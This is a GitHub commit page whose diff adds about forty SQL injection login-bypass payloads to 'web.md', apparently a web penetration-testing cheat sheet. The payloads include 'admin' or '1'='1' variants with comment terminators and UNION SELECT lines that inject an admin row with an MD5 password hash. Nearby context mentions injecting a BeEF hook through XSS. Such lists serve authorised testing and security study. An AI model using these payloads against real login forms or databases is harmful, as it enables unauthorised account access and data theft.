Skip to content

Commit

Permalink
Update web.md
Browse files Browse the repository at this point in the history
  • Loading branch information
740i authored Apr 18, 2018
1 parent d8b7b40 commit 06cfbb3
Showing 1 changed file with 46 additions and 0 deletions.
46 changes: 46 additions & 0 deletions web.md
Original file line number Diff line number Diff line change
Expand Up @@ -134,6 +134,48 @@ or true--
")) or (("x"))=(("x
'-- -
'-- -#
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
```
##### SQLi
Check if you can find a row, where you can place your output
Expand Down Expand Up @@ -179,4 +221,8 @@ Or to use Beef just inject the hook into a XSS after starting it up
```

More reading

https://www.exploit-db.com/papers/13646/

http://brutelogic.com.br/blog/probing-to-find-xss/

0 comments on commit 06cfbb3

Please sign in to comment.